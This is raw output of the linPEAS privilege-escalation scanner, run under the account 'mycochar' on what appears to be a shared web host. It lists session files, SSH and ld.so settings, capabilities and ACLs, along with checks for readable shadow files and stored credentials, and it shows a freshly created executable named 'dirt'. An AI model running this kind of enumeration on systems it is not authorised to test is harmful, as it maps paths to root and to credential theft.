-rw------- 1 mycochar users 0 Nov 15 19:28 /tmp/sess_98e336f0ca2d3b0e61f5bcdd7da0c15d
-rw------- 1 mycochar users 0 Nov 15 19:29 /tmp/sess_9fa9992c4efdda6484c2cb8b6d950348
-rw------- 1 mycochar users 0 Nov 15 19:24 /tmp/sess_a41364ebd8c05590c6a526f8cc9878ac
-rw------- 1 mycochar users 0 Nov 15 19:25 /tmp/sess_ab253329ea6c0a92a27b08bf78a020d5
-rw------- 1 mycochar users 0 Nov 15 20:37 /tmp/sess_b0577de8e35008a9c18cfe397c1c9454
-rw------- 1 mycochar users 0 Nov 15 20:11 /tmp/sess_ba35e04ccdb2337573412c9c4f950f15
-rw------- 1 mycochar users 0 Nov 15 19:51 /tmp/sess_bb8af5429572e14e6285ef9526bf5960
-rw------- 1 mycochar users 0 Nov 15 19:37 /tmp/sess_be5e1c21872ac39f5256e1af26912f7b
-rw------- 1 mycochar users 0 Nov 15 20:31 /tmp/sess_bf1c90f6f40c7cf451c7e47535dc8184
-rw------- 1 mycochar users 0 Nov 15 19:31 /tmp/sess_c28bb3cc93acf9278424311c273883e1
-rw------- 1 mycochar users 0 Nov 15 19:47 /tmp/sess_d0a7d5ae8d5b95094316450e28abe823
-rw------- 1 mycochar users 0 Nov 15 19:42 /tmp/sess_d0b937b7b666854903e3e429cddc5404
-rw------- 1 mycochar users 0 Nov 15 19:09 /tmp/sess_da79a2cce108bb524b65e07dd972e234
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_e81a023e0cc372940e7137b40cc76338
-rw------- 1 mycochar users 0 Nov 15 19:35 /tmp/sess_ebdfb79f42cd0696af3e5b9b6606bb48
-rw------- 1 mycochar users 0 Nov 15 20:33 /tmp/sess_ebe1c68da4e952056b4f03bb1bcaa0c5
-rw------- 1 mycochar users 0 Nov 15 20:03 /tmp/sess_ec3279f8f14b881197e8e2ad7d3f9479
-rw------- 1 mycochar users 0 Nov 15 20:30 /tmp/sess_ed390e562afdb25be7d6df9710beae83
-rw------- 1 mycochar users 0 Nov 15 19:04 /tmp/sess_eefb632863a27d8473b59b07360fb243
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_fb11a28bad8b91b7e4c546975cf8bb1e

╔══════════╣ Searching ssl/ssh files
Port 22
PermitRootLogin without-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no



╔══════════╣ Analyzing PGP-GPG Files (limit 70)
/usr/bin/gpg
netpgpkeys Not Found
netpgp Not Found

-rw------- 1 mycochar users 0 Nov 13 07:35 /home/mycochar/.gnupg/pubring.gpg
-rw------- 1 mycochar users 40 Nov 13 07:35 /home/mycochar/.gnupg/trustdb.gpg

drwx------ 2 mycochar users 5 Nov 15 20:44 /home/mycochar/.gnupg


╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 mycochar users 131 Mar 29  2011 /home/mycochar/.bashrc









╔══════════╣ Checking leaks in git repositories


                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ SUID - Check easy privesc, exploits and write perms
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ SGID
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

╔══════════╣ Checking misconfigurations of ld.so
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/*
cat: /etc/ld.so.conf.d/*: No such file or directory

/etc/ld.so.preload
/usr/lib/i386-linux-gnu/hosting-securize.so
╔══════════╣ Capabilities
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh:  0x0000000000000000=
CapPrm:  0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:  0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37,38,39,40
CapAmb:  0x0000000000000000=

══╣ Parent process capabilities
CapInh:	 0x0000000000000000=
CapPrm:	 0x0000000000000000=
CapEff:	 0x0000000000000000=
CapBnd:	 0x000001ffffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37,38,39,40
CapAmb:	 0x0000000000000000=


Files with capabilities (limited to 50):

╔══════════╣ Files with ACLs (limited to 50)
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
# file: /bin
USER   root      rwx     
GROUP  root      r-x     
group  users     --x     
mask             r-x     
other            r-x     

# file: /etc
USER   root      rwx     
GROUP  root      r-x     
group  users     --x     
mask             r-x     
other            r-x     

# file: /root/
USER   root      rwx     
GROUP  root      ---     
group  users     --x     
mask             --x     
other            ---     

# file: /sbin
USER   root      rwx     
GROUP  root      r-x     
group  users     --x     
mask             r-x     
other            r-x     

# file: /usr
USER   root      rwx     
GROUP  root      r-x     
group  users     --x     
mask             r-x     
other            r-x     

# file: /root
USER   root      rwx     
GROUP  root      ---     
group  users     --x     
mask             --x     
other            ---     

files with acls in searched folders Not Found

╔══════════╣ Files (scripts) in /etc/profile.d/
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/m
/home/m/y
/home/m/y/c
/home/m/y/c/mycochar
/root/

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files


╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
╔══════════╣ .sh files in path
β•š https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
You own the script: ./linpeas.sh

╔══════════╣ Executable files potentially added by user (limit 70)

╔══════════╣ Unexpected in root
find: `/': Permission denied

╔══════════╣ Modified interesting files in the last 5mins (limit 100)


╔══════════╣ Files inside /home/mycochar (limit 20)
total 198
drwx---r-x  6 mycochar users    13 Nov 15 20:15 .
drwxr-xr-x  4 root     root     80 Nov 15 04:35 ..
-rw-------  1 mycochar users   519 Nov 15 20:30 .bash_history
-rw-r--r--  1 mycochar users    24 Mar 29  2011 .bash_logout
-rw-r--r--  1 mycochar users   236 Mar 29  2011 .bash_profile
-rw-r--r--  1 mycochar users   131 Mar 29  2011 .bashrc
-rw-------  1 mycochar users    27 Mar 29  2011 .forward
drwx------  2 mycochar users     5 Nov 15 20:44 .gnupg
-rw----r--  1 mycochar users   189 Jul  3  2015 .ovhconfig
-rwxr-xr-x  1 mycochar users 18040 Nov 15 20:15 dirt
drwx---r-x  2 mycochar users    39 Aug 24  2012 photo
drwx---r-x  2 mycochar users     2 Mar 29  2011 sessions
drwx---r-x 18 mycochar users    61 Mar 23  2023 www

╔══════════╣ Files inside others home (limit 20)

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup files (limited 100)

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /home/mycochar/www/image/Thumbs.db: Microsoft Thumbs.db [transparent.gif, barrehaut.jpg, fond.jpg, trans.png, transparent.png, barrehaut.png, fond70.png, fond80.png, pdf.png, , ]


╔══════════╣ Web files?(output limit)

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw------- 1 mycochar users 0 Nov 15 20:43 /tmp/sess_823ea765fd9a530633db3914a933d7c6
-rw------- 1 mycochar users 0 Nov 15 20:37 /tmp/sess_b0577de8e35008a9c18cfe397c1c9454
-rw------- 1 mycochar users 0 Nov 15 20:33 /tmp/sess_ebe1c68da4e952056b4f03bb1bcaa0c5
-rw------- 1 mycochar users 0 Nov 15 20:33 /tmp/sess_86624df08b80228bf72b330d91cf3015
-rw------- 1 mycochar users 0 Nov 15 20:32 /tmp/sess_31f1b2501534bbc4f89be45a04f8ab51
-rw------- 1 mycochar users 0 Nov 15 20:32 /tmp/sess_85ea8f34de8f0e634a35f2363c161f19
-rw------- 1 mycochar users 0 Nov 15 20:31 /tmp/sess_bf1c90f6f40c7cf451c7e47535dc8184
-rw------- 1 mycochar users 0 Nov 15 20:30 /tmp/sess_ed390e562afdb25be7d6df9710beae83
-rw------- 1 mycochar users 0 Nov 15 20:29 /tmp/sess_6b46972afd8a5aa65e88970504d909cb
-rw------- 1 mycochar users 0 Nov 15 20:25 /tmp/sess_34e949e5b4a9bf5a18089164d102e0a3
-rw------- 1 mycochar users 0 Nov 15 20:23 /tmp/sess_6946f3d8377c399f1095f1581e8ec6b2
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_e81a023e0cc372940e7137b40cc76338
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_fb11a28bad8b91b7e4c546975cf8bb1e
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_5948e49ff46b4341a676ec8346691b82
-rw------- 1 mycochar users 0 Nov 15 20:19 /tmp/sess_24b5a01dc832778a06ca362150f798e2
-rw------- 1 mycochar users 0 Nov 15 20:15 /tmp/sess_38987a9624a61f75827f5e4e490ed449
-rw------- 1 mycochar users 0 Nov 15 20:14 /tmp/sess_8368dd5fa0b7fa44e124b584834c974c
-rwxr-xr-x 1 mycochar users 18040 Nov 15 20:14 /tmp/dirt
-rw------- 1 mycochar users 0 Nov 15 20:11 /tmp/sess_ba35e04ccdb2337573412c9c4f950f15
-rw------- 1 mycochar users 0 Nov 15 20:09 /tmp/sess_735ce800d3dd7d725cf2f6b0291c8e20
-rw------- 1 mycochar users 0 Nov 15 20:06 /tmp/sess_45186abe9c664700116044b6edf8ad50
-rw------- 1 mycochar users 0 Nov 15 20:03 /tmp/sess_ec3279f8f14b881197e8e2ad7d3f9479
-rw------- 1 mycochar users 0 Nov 15 19:55 /tmp/sess_29603613e4507f8d635e8ce1d00583a9
-rw------- 1 mycochar users 0 Nov 15 19:51 /tmp/sess_2dc13514193365a6120f5aa38a97a597
-rw------- 1 mycochar users 0 Nov 15 19:51 /tmp/sess_bb8af5429572e14e6285ef9526bf5960
-rw------- 1 mycochar users 0 Nov 15 19:47 /tmp/sess_d0a7d5ae8d5b95094316450e28abe823
-rw------- 1 mycochar users 0 Nov 15 19:47 /tmp/sess_2cb0d51995895f00bd652a81417b54e1
-rw------- 1 mycochar users 0 Nov 15 19:46 /tmp/sess_4017f58b150c2d81a9b57230f8784391
-rw------- 1 mycochar users 0 Nov 15 19:42 /tmp/sess_d0b937b7b666854903e3e429cddc5404
-rw------- 1 mycochar users 0 Nov 15 19:37 /tmp/sess_be5e1c21872ac39f5256e1af26912f7b
-rw------- 1 mycochar users 0 Nov 15 19:35 /tmp/sess_ebdfb79f42cd0696af3e5b9b6606bb48
-rw------- 1 mycochar users 0 Nov 15 19:33 /tmp/sess_648fde2190072c5b0e4e5e467cd937ae
-rw------- 1 mycochar users 0 Nov 15 19:31 /tmp/sess_c28bb3cc93acf9278424311c273883e1
-rw------- 1 mycochar users 0 Nov 15 19:29 /tmp/sess_9fa9992c4efdda6484c2cb8b6d950348
-rw------- 1 mycochar users 0 Nov 15 19:28 /tmp/sess_98e336f0ca2d3b0e61f5bcdd7da0c15d
-rw------- 1 mycochar users 0 Nov 15 19:28 /tmp/sess_8382a99bd1b50ca3283e772c25a4c0d2
-rw------- 1 mycochar users 0 Nov 15 19:25 /tmp/sess_ab253329ea6c0a92a27b08bf78a020d5
-rw------- 1 mycochar users 0 Nov 15 19:25 /tmp/sess_8ffe0701697a41b0de306da072f19fa7
-rw------- 1 mycochar users 0 Nov 15 19:24 /tmp/sess_a41364ebd8c05590c6a526f8cc9878ac
-rw------- 1 mycochar users 0 Nov 15 19:21 /tmp/sess_43233c6b4111ca3b24f4706f35dcf9ad
-rw------- 1 mycochar users 0 Nov 15 19:19 /tmp/sess_01d28c2a3a52cd7a037f9f7a99d466a8
-rw------- 1 mycochar users 0 Nov 15 19:18 /tmp/sess_84408de5120e9ed6b8c860994c9053b8
-rw------- 1 mycochar users 0 Nov 15 19:11 /tmp/sess_3641eeaf4c0c0c011dbb9558ec238a81
-rw------- 1 mycochar users 0 Nov 15 19:09 /tmp/sess_da79a2cce108bb524b65e07dd972e234
-rw------- 1 mycochar users 0 Nov 15 19:09 /tmp/sess_3bf144273538b5b45ec8be93621f23ef
-rw------- 1 mycochar users 0 Nov 15 19:09 /tmp/sess_0fc880d1c697df4968af7b4e832b0729
-rw------- 1 mycochar users 0 Nov 15 19:07 /tmp/sess_6fc461c011baafc421bf76392728fb40
-rw------- 1 mycochar users 0 Nov 15 19:07 /tmp/sess_1b7d5173984bc4410113c58a5cff83a9
-rw------- 1 mycochar users 0 Nov 15 19:04 /tmp/sess_227f383b740484c6488e15df433785ae
-rw------- 1 mycochar users 0 Nov 15 19:04 /tmp/sess_eefb632863a27d8473b59b07360fb243
-rw------- 1 mycochar users 0 Nov 15 19:04 /tmp/sess_1c4b70d3388df6cdb38fdbeeb960ff9c

╔══════════╣ Searching passwords in history files
sh linpeas.sh

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/home/mycochar/www/changepassword.php

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching IPs inside logs (limit 70)

╔══════════╣ Searching passwords inside logs (limit 70)

╔══════════╣ Searching emails inside logs (limit 70)

╔══════════╣ Searching possible password variables inside key folders (limit 140)

╔══════════╣ Searching possible password in config files (if k8s secrets are found you need to read the file)



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•
Regexes to search for API keys aren't activated, use param '-r'